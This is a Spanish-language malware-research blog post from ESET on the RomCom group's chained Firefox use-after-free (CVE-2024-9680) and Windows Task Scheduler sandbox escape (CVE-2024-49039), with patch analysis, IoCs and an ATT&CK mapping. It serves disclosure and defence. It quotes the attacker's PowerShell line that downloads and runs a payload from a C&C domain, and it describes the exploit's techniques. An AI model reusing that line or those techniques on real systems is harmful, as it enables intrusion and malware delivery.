Investigadores de ESET descubrieron una vulnerabilidad previamente desconocida en productos Mozilla, explotada in the wild por el grupo alineado con Rusia RomCom. Esta es la segunda vez que RomCom ha sido sorprendido explotando una vulnerabilidad significativa de zero day in the wild, después del abuso de CVE-2023-36884 a través de Microsoft Word en junio de 2023.

Esta vulnerabilidad crítica, asignada CVE-2024-9680 con una puntuación CVSS de 9,8, permite a las versiones vulnerables de Firefox, Thunderbird y el navegador Tor ejecutar código en el contexto restringido del navegador. Encadenado con otra vulnerabilidad previamente desconocida en Windows, asignada CVE-2024-49039 con una puntuación CVSS de 8,8, se puede ejecutar código arbitrario en el contexto del usuario conectado. En un ataque exitoso, si una víctima navega a una página web que contenga el exploit, un adversario puede ejecutar código arbitrario —sin ninguna interacción del usuario requerida— que en este caso llevó a la instalación del backdoor del mismo nombre de RomCom en el ordenador de la víctima.

Puntos clave de este blogpost:
  • El 8 de octubre de 2024, los investigadores de ESET descubrieron una vulnerabilidad de zero day previamente desconocida en los productos de Mozilla que estaba siendo explotada in the wild.
  • El análisis del exploit llevó al descubrimiento de la vulnerabilidad, ahora asignada a CVE-2024-9680: un error de uso después de la liberación en la función de línea de tiempo de animación en Firefox. Mozilla corrigió la vulnerabilidad el 9 de octubre de 2024.
  • Análisis posteriores revelaron otra vulnerabilidad zero day en Windows: un fallo de escalada de privilegios, ahora asignado CVE-2024-49039, que permite ejecutar código fuera del sandbox de Firefox. Microsoft publicó un parche para esta segunda vulnerabilidad el 12 de noviembre de 2024.
  • Los intentos de explotación exitosos entregaron el backdoor RomCom, en lo que parece una campaña generalizada.

Perfil de RomCom

RomCom —también conocido como Storm-0978, Tropical Scorpius o UNC2596— es un grupo alineado con Rusia que lleva a cabo tanto campañas oportunistas contra sectores empresariales como operaciones de espionaje selectivo. El enfoque del grupo ha cambiado para incluir operaciones de espionaje, en paralelo con sus operaciones de ciberdelincuencia más convencionales. El backdoor utilizado por el grupo es capaz de ejecutar comandos y descargar módulos adicionales en la máquina de la víctima.

La Tabla 1 muestra los sectores objetivo, según nuestra investigación, de RomCom en 2024. Esto pone de manifiesto que el grupo se dedica al espionaje, pero también a operaciones de ciberdelincuencia.

Tabla 1. Víctimas de RomCom en 2024 Víctimas de RomCom en 2024

Vertical and region Purpose First seen
Governmental entity in Ukraine Espionage 2024-01
Pharmaceutical sector in the US Cybercrime 2024-03
Legal sector in Germany Cybercrime 2024-03
Insurance sector in the US Cybercrime 2024-04
Defense sector in Ukraine Espionage 2024-08
Energy sector in Ukraine Espionage 2024-08
Governmental entities in Europe Espionage 2024-08
Worldwide targeting – Firefox exploit Unknown 2024-10

Cadena de compromiso

La cadena de compromiso se compone de un sitio web falso que redirige a la víctima potencial al servidor que aloja el exploit, y en caso de que el exploit tenga éxito, se ejecuta shellcode que descarga y ejecuta el backdoor RomCom —un ejemplo se muestra en la Figura 1. Aunque no sabemos cómo se distribuye el enlace al sitio web falso, si se accede a la página utilizando un navegador vulnerable, se suelta un payload que se ejecuta en el ordenador de la víctima sin que sea necesaria la interacción del usuario. Finalmente, se realiza una redirección de JavaScript utilizando window.location.href después de unos segundos, dando tiempo a que se ejecute el exploit.

Figure 1. Exploit chain to compromise the victim
Figura 1. Cadena de exploits para comprometer a la víctima

Desde el 10 de octubre de 2024 hasta el 16 de octubre de 2024, justo después de que se parchease la primera vulnerabilidad, encontramos otros servidores de C&C que alojaban el exploit. Utilizaban un esquema de nomenclatura recurrente para sus servidores falsos, añadiendo el prefijo o sufijo redir o red a un dominio legítimo, a veces cambiando también su dominio de nivel superior (TLD), como se muestra en la Tabla 2. La redirección al final del intento de explotación llevaba a las víctimas al sitio web legítimo en el nombre de dominio original, presumiblemente para evitar levantar las sospechas de los objetivos.

Tabla 2. Servidores falsos que redirigen al exploit

First seen Fake server Final redirect to Redirect website purpose
2024⁠-⁠10⁠-⁠10 redircorrectiv[.]com correctiv.org Nonprofit independent newsroom.
2024⁠-⁠10⁠-⁠14 devolredir[.]com devolutions.net Remote access and password management solutions.
2024⁠-⁠10⁠-⁠15 redirconnectwise[.]cloud connectwise.com MSP technology and IT management software.
2024⁠-⁠10⁠-⁠16 redjournal[.]cloud connectwise.com

Si una víctima que utiliza un navegador vulnerable visita una página web que contenga este exploit, se activa la vulnerabilidad y se ejecuta shellcode en un proceso de contenido. El shellcode se compone de dos partes: la primera recupera el segundo de la memoria y marca las páginas que contiene como ejecutables, mientras que la segunda implementa un cargador PE basado en el proyecto de código abierto Shellcode Reflective DLL Injection (RDI).

La biblioteca cargada implementa un escape sandbox para Firefox que conduce a la descarga y ejecución del backdoor RomCom en el ordenador de la víctima. El backdoor se escenifica en un servidor C&C ubicado en journalctd[.]live, correctiv[.]sbs, o cwise[.]store, dependiendo de la muestra.

Según nuestra telemetría, desde el 10 de octubre de 2024 hasta el 4 de noviembre de 2024, las víctimas potenciales que visitaron los sitios web que alojaban el exploit se encontraban principalmente en Europa y Norteamérica, como se muestra en la Figura 2. El número de objetivos potenciales va desde una sola víctima por país hasta 250, según la telemetría de ESET.

Figure 2. Heatmap of potential victims
Figura 2. Mapa de calor de víctimas potenciales

CVE-2024-9680: Use-after-free en Firefox Animation Timeline 

El 8 de octubre de 2024, encontramos archivos interesantes utilizados para entregar el backdoor RomCom, alojados en el servidor 1drv.us[.]com controlado por el actor de la amenaza. Los exploits se dirigen a una vulnerabilidad use-after-free en Firefox Animation Timeline, permitiendo a un atacante la ejecución de código en un proceso de contenido. Durante nuestra investigación, analizamos los archivos a los que se hace referencia en la Tabla 3.

Tabla 3. Archivos relacionados con el exploit Archivos relacionados con el exploit

Name Description
main-128.js JavaScript file containing the exploit for versions of Firefox from 106 to 128.
main-129.js JavaScript file containing the exploit for versions of Firefox from 129 to 131.
main-tor.js JavaScript file containing the exploit for Tor Browser versions 12 and 13.
script.js JavaScript file used to generate a CAPTCHA.
utils.js JavaScript file containing helper functions, e.g., to convert data types, or to get the OS type or browser version.
animation0.html HTML iframe loaded by the exploit to trigger the use-after-free vulnerability.
index.html HTML page loading the exploit and redirecting to a legitimate website after a few seconds.

Las marcas de tiempo relacionadas con estos archivos indican que fueron creados el 3 de octubre de 2024 y puestos online; sin embargo, el actor de la amenaza podría haber estado en posesión de este exploit antes de esta fecha.

Informamos de la vulnerabilidad a Mozilla poco después de descubrirla, con la siguiente cronología de acontecimientos:

  • 08-10-2024: Descubrimiento y análisis inicial.
  • 08-10-2024: Notificación de la vulnerabilidad a Mozilla.
  • 08-10-2024: Vulnerabilidad reconocida por Mozilla.
  • 09-10-2024: CVE-2024-9680 asignado por Mozilla Corporation.
  • 09-10-2024: Vulnerabilidad parcheada en Firefox, Security Advisory 2024-51.
  • 09-10-2024: Vulnerabilidad parcheada en Tor Browser con la versión 13.5.7.
  • 10-10-2024: Vulnerabilidad parcheada en Tails con la versión 6.8.1.
  • 10-10-2024: Vulnerabilidad parcheada en Thunderbird, Security Advisory 2024-52.

Nos gustaría agradecer al equipo de Mozilla su gran capacidad de respuesta y destacar su impresionante trabajo para publicar un parche en un día.

Mozilla y el Proyecto Tor publicaron un parche que corrige la vulnerabilidad en las siguientes versiones:

  • Firefox 131.0.2
  • Firefox ESR 115.16.1
  • Firefox ESR 128.3.1
  • Navegador Tor 13.5.7
  • Tails 6.8.1
  • Thunderbird 115.16
  • Thunderbird 128.3.1
  • Thunderbird 131.0.1

Durante la preparación de este blogpost, el investigador independiente Dimitri Fourny publicó un análisis detallado de la vulnerabilidad el 14 de noviembre de 2024.

Análisis de la causa

El main-<Firefox version>.js comprueba primero la versión exacta del navegador, y determina su explotabilidad comprobando algunos desplazamientos y tamaños de objetos específicos para una versión afectada. Si se superan estas comprobaciones, procede a añadir un iframe HTML en la página del exploit, implementado en animation0.html. Este último crea cuatro elementos HTML div identificados respectivamente como target0 a target3, pero lo más importante es que define una función getter para la propiedad then de Object.prototype, tal y como se muestra en la Figura 3. Esta función activará la función use-after. Esta función activará la vulnerabilidad use-after-free como se explica a continuación. Nótese que los comentarios (en verde oscuro) son de los autores del exploit; esto podría indicar que el exploit estaba todavía en fase de desarrollo o que el actor de la amenaza lo compró.

Figure 3. The JavaScript exploit defines the then property’s getter function on every object
Figura 3. El exploit de JavaScript define la función getter de la propiedadthen en cada objeto, lo que desencadena una vulnerabilidad use-after-free

Después de un poco de heap spraying inicial, la función prepare crea cuatro objetos Animation, uno por cada elemento div creado previamente, como se ilustra en la Figura 4. Estos objetos de animación son manejados por un objeto AnimationTimeline.

Figure 4. The exploit code creates animation objects for div elements
Figura 4. El código del exploit crea objetos de animación para elementosdiv

A lo largo del documento de animation timeline, la función test pausa y devuelve la propiedad ready del primer y segundo objeto de animación. Como se indica en la documentación, la propiedad ready devuelve una Promise que resuelve cuando la animación está lista para ser reproducida. Llamando al médodo then sobre la promise provoca que se llame a la función getter mostrada en la Figura 3. Esencialmente, esta función incrementa una variable flag global y cuando alcanza 2, el primer objeto de animación(anim0) es cancelado, y todos los elementos div son eliminados. La llamada a la función rm0 (mostrada en la Figura 3) pone los objetos de animación en null para liberarlos, lo que desencadena la vulnerabilidad use-after-free. Esta función también hace algo de heap feng shui y, en el exploit descubierto inicialmente, llama a la función getInfo responsable de lograr la ejecución de código.

Mientras tanto, a medida que se actualiza el documento animation0.html, se llama periódicamente al método Tick de su objeto AnimationTimeline. Como se puede ver en la Figura 5, este método itera sobre los diferentes objetos de animación presentes en la línea de tiempo de animación y añade las animaciones a eliminar a una variable local llamada animationsToRemove.

Figure 5. In AnimationTimeline::Tick, animation objects to be removed are appended to local array variable animationsToRemove
Figura 5. En AnimationTimeline::Tick, los objetos de animation a eliminar se añaden a la variable local animationsToRemove

El bug radica en que, mientras se itera sobre los diferentes objetos de animación de animation timeline, el método Tick del objeto Animation, es llamado lo que puede llevar a la liberación del objeto de animación actual, resultando en el manejo de un dangling pointer. Mientras depurábamos el exploit, observamos una secuencia de llamadas que finalmente terminaban en la función getter explicada anteriormente, como se ilustra en la Figura 6 y Figura 7.

Figure 6. Call stack of the animation being cancelled
Figura 6. Pila de llamadas de la animación cancelada por la función getter llamada a través del métodoAnimation::Tick
Figure 7. The Animation PauseAt method ends up calling the getter function
Figura 7. El metodo Animation PauseAt termina llamandoa la función getter

La función getter llama a Animation::Cancel que a su vez llama a AnimationTimeline::RemoveAnimation. Luego, los objetos de animación anim0 y anim1 son puestos a null para que sean liberados. Cuando AnimationTimeline::Tick itera sobre el array animationsToRemove (línea 74 en la Figura 5), AnimationTimeline::RemoveAnimation manipulará un puntero colgante de un objeto Animation que ya fue eliminado, como se muestra en la Figura 8.

Figure 8. Call stack of the crash in AnimationTimeline RemoveAnimation
Figura 8. Pila de llamadas del fallo en AnimationTimeline::RemoveAnimation mientras manipula un dangling pointer

Después de liberar las animaciones en la función rm0, el exploit procede con más heap management para controlar los objetos que reemplazarán a las animaciones liberadas, y finalmente, se llama a la función getInfo, como se ve en la Figura 9.

Figure 9. Exploit code function rm0 triggers the use-after-free bug and exploits it
Figura 9. La función rm0del código del exploit desencadena el fallo use-after-free y lo explota

Sin entrar en demasiados detalles sobre el código exploit, su autor abusó de los objetos div y sus atributos, así como de los objetos ImageData para filtrar propiedades de estos últimos, tal y como se observa en la Figura 10.

Figure 10. Exploit code getInfo function attempts to leak an ImageData object
Figura 10. La función getInfodel código exploit intenta filtrar un objetoImageData

A continuación, el código exploit procede a manipular objetos ArrayBuffer para filtrar la dirección de un objeto JavaScript arbitrario (conocido como primitiva addrof ) y abusar del compilador JIT de Firefox para ejecutar el primer componente shellcode en el contexto de un proceso de contenido, como se ilustra en la figura 11. Esta técnica se explica con gran detalle en este blogpost.

Figure 11. The exploit code abuses the Firefox JIT compiler to execute shellcode
Figura 11. El código del exploit abusa del compilador JIT de Firefox para ejecutar shellcode

Mozilla parcheó la vulnerabilidad en Firefox 131.0.2, Firefox ESR 128.3.1 y Firefox ESR 115.16.1 el 9 de octubre de 2024. Esencialmente, los pointers a los objetos de animación manejados el timeline se implementan ahora a través de punteros contadores de referencias(RefPtr), como sugiere el diff, lo que impide que las animaciones sean liberadas, ya que AnimationTimeline::Tick seguirá manteniendo una referencia a ellas.

Análisis del código shell

Ambos shellcodes están almacenados en el fichero JavaScript exploit main-<Firefox version>.js. El primero se crea dinámicamente como una matriz de números flotantes, mientras que el segundo se almacena como una enorme matriz de bytes.

El shellcode de Egghunting

Este primer shellcode simplemente recupera el segundo shellcode buscando en memoria un valor mágico codificado de 0x8877665544332211, cambia su protección de memoria a lectura-escritura-ejecución (RWX), y ejecuta el código localizado en esta dirección.

Código shell del cargador reflectivo

Este segundo shellcode es la versión compilada del proyecto Shellcode RDI, que permite cargar una DLL. Las constantes utilizadas en el shellcode no fueron modificadas por el actor de la amenaza ( véase https://github.com/monoxgas/sRDI/blob/master/Native/Loader.cpp#L367 frente a las constantes mostradas en la Figura 12).

Figure 12. The constants used in the public Shellcode RDI project remained unchanged
Figura 12. Las constantes utilizadas en el proyecto público Shellcode RDI no se modificaron

El shellcode simplemente carga una biblioteca incrustada cuyo único propósito es escapar de las restricciones del proceso de contenido sandboxed de Firefox.

CVE-2024-49039: Escalada de privilegios en el Programador de tareas de Windows

La librería cargada (SHA1: ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6), llamada PocLowIL por sus desarrolladores y compilada el 3 de octubre de 2024, implementa un escape del sandbox desde el nivel de proceso no confiable del proceso de contenido a un nivel medio. Esencialmente, la librería hace uso de un endpoint RPC no documentado, que no debería ser invocable desde un nivel de proceso no confiable, para lanzar un proceso PowerShell oculto que descarga una segunda etapa desde un servidor C&C.

La cronología de la revelación de la vulnerabilidad es la siguiente:

  • 2024-10-08: Como parte de nuestro informe inicial a Mozilla para CVE-2024-9680, también proporcionamos lo que creíamos que era un escape sandbox.
  • 2024-10-14: El equipo de seguridad de Mozilla confirmó la fuga del sandbox y consideró que la vulnerabilidad estaba relacionada con un fallo de seguridad de Windows. Nos informaron de que se habían puesto en contacto con el Centro de Respuesta de Seguridad de Microsoft (MSRC) para evaluar la vulnerabilidad.
  • 2024-11-12: Microsoft publicó un aviso para CVE-2024-49039 y su correspondiente parche a través de la actualización KB5046612. La vulnerabilidad también fue encontrada de forma independiente por Vlad Stolyarov y Bahare Sabouri del Grupo de Análisis de Amenazas de Google, como se menciona en KB5046612.

Análisis de la causa

El código de escape del sandbox reside en la relativamente pequeña función principal de la librería. Hace uso de un punto final RPC no documentado, como se ilustra en la Figura 13.

Figure 13. The PocLowIL library prepares to interact with a task-related endpoint
Figura 13. La libreríaPocLowIL se prepara para interactuar con un endpoint relacionado con una tarea

La función procede a rellenar estructuras no documentadas y llama a NdrClientCall2 tres veces. El primer parámetro pasado a esta función, pStubDescriptor, es una estructura MIDL_STUB_DESC cuyo miembro RpcInterfaceInformation apunta a una interfaz identificada por el GUID 33D84484-3626-47EE-8C6F-E7E98B113BE1. Esta interfaz está implementada en la biblioteca de Windows WPTaskScheduler.dll, cargada por schedsvc.dll, alojada en el proceso del servicio programador de tareas(svchost.exe).

Según nuestro análisis de esta interfaz, el código de escape del sandbox llama a las siguientes funciones:

  • s_TaskSchedulerCreateSchedule
  • s_TaskSchedulerExecuteSchedule
  • s_TaskSchedulerDeleteSchedule (usada solo para limpieza)

Usando RpcView y después de invertir parcialmente algunas estructuras, averiguamos las estructuras principales, como se ilustra en la Figura 14.

Figure 14. The main structures used to create a scheduled task through the RPC interface
Figura 14. Las principales estructuras usadas para crear una tarea programada a través de la interfaz RPC

Después de aplicar estas estructuras en IDA Pro, obtuvimos una visión más clara de la tarea, como se ve en la Figura 15.

Figure 15. IDA Pro pseudocode view of the sandbox escape code
Figura 15. Vista en pseudocódigo de IDA Pro del código de escape del sandbox

Basado en el código, la librería maliciosa crea una tarea programada que ejecutará una aplicación arbitraria a un nivel de integridad medio, permitiendo a los atacantes elevar sus privilegios en el sistema y escapar del sandbox. Esto es posible debido a la falta de restricciones impuestas en el descriptor de seguridad aplicado a la interfaz RPC durante su creación, como se ilustra en la Figura 16.

Figure 16. Permissive security descriptor applied to the RPC interface
Figura 16. Descriptor de seguridad permisivo aplicado a la interfaz RPC

La variable renombrada interface_security_descriptor, utilizada cuando se llama a RpcServerRegisterIf3, tiene el siguiente valor: D:P(A;;GA;;;S-1-15-2-1)(A;;GA;;;WD). Según el Lenguaje de Definición de Descriptores de Seguridad (SDDL), permite a todo el mundo (WD) comunicarse con la interfaz RPC y llamar a sus procedimientos independientemente de su nivel de integridad.

Explotación

En este caso, el actor de la amenaza creó una tarea llamada firefox.exe que lanzará conhost.exe en modo headless para ocultar la ventana del proceso hijo. La desofuscación del resto de la línea de comandos (que se muestra en la Figura 15) reveló el código PowerShell que se ve en la Figura 17. El código es el siguiente

$a=$env:public + '\\\public'; Invoke-WebRequest https://journalctd[.]live/JfWb4OrQPLh -o $a; sleep 15; Rename-Item $a ($a = ($a + '.exe')) # $env:public\public.exe Iniciar-proceso $a; sleep 10; Renombrar-elemento $a ($a = ($a -replace 'public.e', 'epublic.e')) # $env:public\public.exe Inicio-Proceso $a

Figura 17. Código PowerShell descargando un componente de la siguiente fase

Se descarga un ejecutable de https://journalctd[.]live/JfWb4OrQPLh, se almacena en la carpeta %PUBLIC% como public.exe y se ejecuta. Transcurridos 10 segundos, se renombra como epublic. exe y se vuelve a ejecutar.

Breve análisis del parche

La versión parcheada de WPTaskScheduler.dll (versión 10.0.19041.5129) publicada con KB5046612 utiliza un descriptor de seguridad más complicado, como se muestra en la Figura 18.

Figure 18. The security descriptor introduced by the patch is more restrictive
Figura 18. El descriptor de seguridad introducido por el parche es más restrictivo

El nuevo descriptor de seguridad es

D:(A;;GRGWGX;;;SY)(A;;GRGWGX;;;LS)(A;;GR;;;NS)(A;;GR;;;IU)S:(ML;;NWNXNR;;;ME)

El desglose de la cadena revela la siguiente lógica de restricción:

  • las cuentas de sistema(SY) y de servicio local(LS) tienen acceso de lectura, escritura y ejecución,
  • la cuenta de servicio de red(NS) y los usuarios interactivos (IU) sólo tienen acceso de lectura,
  • por último, a los objetos de integridad inferior al nivel medio(ME) se les deniega el acceso de lectura, escritura y ejecución.

Las nuevas restricciones impuestas por el descriptor de seguridad actualizado evitan la escalada de privilegios y dejan obsoleto el código de escape del sandbox.

Conclusión

El encadenamiento de dos vulnerabilidades de zero days dotó a RomCom de un exploit que no requiere interacción del usuario. Este nivel de sofisticación muestra la voluntad y los medios del actor de la amenaza para obtener o desarrollar capacidades sigilosas. ESET compartió hallazgos detallados con Mozilla, siguiendo nuestro proceso coordinado de divulgación de vulnerabilidades poco después del descubrimiento. Mozilla publicó un blog sobre cómo reaccionó ante la revelación y pudo publicar una solución en 25 horas, lo que es muy impresionante en comparación con los estándares de la industria.

Para cualquier consulta sobre nuestra investigación publicada en WeLiveSecurity, póngase en contacto con nosotros en threatintel@eset.com.
ESET Research ofrece informes privados de inteligencia APT y fuentes de datos. Para cualquier consulta sobre este servicio, visite la página de ESET Threat Intelligence.

IoCs

Puede encontrar una lista completa de indicadores de compromiso y muestras en nuestro repositorio de GitHub.

Archivos

SHA-1 Filename Detection Description
A4AAD0E2AC1EE0C8DD25968FA4631805689757B6 utils.js JS/Exploit.Agent.NSF RomCom Firefox exploit.
CA6F8966A3B2640F49B19434BA8C21832E77A031 main-tor.js JS/Exploit.Agent.NSE RomCom Firefox exploit.
21918CFD17B378EB4152910F1246D2446F9B5B11 main-128.js JS/Exploit.Agent.NSE RomCom Firefox exploit.
703A25F053E356EB6ECE4D16A048344C55DC89FD main-129.js JS/Exploit.Agent.NSE RomCom Firefox exploit.
ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6 PocLowIL.dll Win64/Runner.AD RomCom Firefox sandbox escape.
A9D445B77F6F4E90C29E385264D4B1B95947ADD5 PocLowIL.dll Win64/Runner.AD RomCom Tor browser sandbox escape.

Red

IP Domain Hosting provider First seen Details
194.87.189[.]171 journalctd[.]live Aeza International LTD 2024⁠-⁠10⁠-⁠08 RomCom second-stage C&C server.
178.236.246[.]241 correctiv[.]sbs AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠09 RomCom second-stage C&C server.
62.60.238[.]81 cwise[.]store AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠15 RomCom second-stage C&C server.
147.45.78[.]102 redircorrectiv[.]com AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠10 RomCom exploit delivery C&C server.
46.226.163[.]67 devolredir[.]com AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠14 RomCom exploit delivery C&C server.
62.60.237[.]116 redirconnectwise[.]cloud AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠15 RomCom exploit delivery C&C server.
62.60.237[.]38 redjournal[.]cloud AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠16 RomCom exploit delivery C&C server.
194.87.189[.]19 1drv.us[.]com AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠08 RomCom malware delivery C&C server.
45.138.74[.]238 economistjournal[.]cloud AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠16 RomCom exploit redirection C&C server.
176.124.206[.]88 N/A AEZA INTERNATIONAL LTD 2024⁠-⁠10⁠-⁠08 RomCom second-stage C&C server.

Técnicas ATT&CK de MITRE

Esta tabla se ha elaborado utilizando la versión 16 del marco MITRE ATT&CK.

Tactic ID Name Description
Resource Development T1583 Acquire Infrastructure RomCom sets up VPSes and buys domain names.
T1587.001 Develop Capabilities: Malware RomCom develops malware in multiple programming languages.
T1587.004 Develop Capabilities: Exploits RomCom may develop exploits used for initial compromise.
T1588.003 Obtain Capabilities: Code Signing Certificates RomCom obtains valid code-signing certificates to sign its malware.
T1588.005 Obtain Capabilities: Exploits RomCom may acquire exploits used for initial compromise.
T1588.006 Obtain Capabilities: Vulnerabilities RomCom may obtain information about vulnerabilities it uses for targeting victims.
T1608 Stage Capabilities RomCom stages malware on multiple delivery servers.
Initial Access T1189 Drive-by Compromise RomCom compromises victims through a user visiting a website hosting an exploit.
Execution T1053.005 Scheduled Task/Job: Scheduled Task RomCom creates a scheduled task using RCP to execute the next stage downloader.
Persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking The RomCom backdoor hijacks DLLs loaded by explorer.exe or wordpad.exe for persistence.
Privilege Escalation T1068 Exploitation for Privilege Escalation RomCom exploits a vulnerability to escape the Firefox sandbox.
Defense Evasion T1622 Debugger Evasion The RomCom backdoor detects debuggers by registering an exception handler.
T1480 Execution Guardrails The RomCom backdoor checks whether the system state is suitable for execution.
T1027.011 Obfuscated Files or Information: Fileless Storage The RomCom backdoor is stored encrypted in the registry.
T1553.002 Subvert Trust Controls: Code Signing The RomCom backdoor weakens security mechanisms by using trusted code-signing certificates.
Credential Access T1555.003 Credentials from Password Stores: Credentials from Web Browsers The RomCom backdoor collects passwords, cookies, and sessions using a browser stealer module.
T1552.001 Unsecured Credentials: Credentials In Files The RomCom backdoor collects passwords using a file reconnaissance module.
Discovery T1087 Account Discovery The RomCom backdoor collects username, computer, and domain data.
T1518 Software Discovery The RomCom backdoor collects information about installed software and versions.
T1614 System Location Discovery The RomCom backdoor checks for a specific keyboard layout ID (KLID).
Lateral Movement T1021 Remote Services The RomCom backdoor creates SSH tunnels to move laterally within compromised networks.
Collection T1560 Archive Collected Data The RomCom backdoor stores data in a ZIP archive for exfiltration.
T1185 Man in the Browser The RomCom backdoor steals browser cookies, history, and saved passwords.
T1005 Data from Local System The RomCom backdoor collects specific file types based on file extensions.
T1114.001 Email Collection: Local Email Collection The RomCom backdoor collects files with .msg, .eml, and .email extensions.
T1113 Screen Capture The RomCom backdoor takes screenshots of the victim’s computer.
Command and Control T1071.001 Standard Application Layer Protocol: Web Protocols The RomCom backdoor uses HTTP or HTTPS as a C&C protocol.
T1573.002 Encrypted Channel: Asymmetric Cryptography The RomCom backdoor encrypts communication using SSL certificates.
Exfiltration T1041 Exfiltration Over Command-and-Control Channel The RomCom backdoor exfiltrates data using the HTTPS C&C channel.
Impact T1565 Data Manipulation RomCom manipulates systems and steals data.
T1657 Financial Theft RomCom compromises companies for financial interest.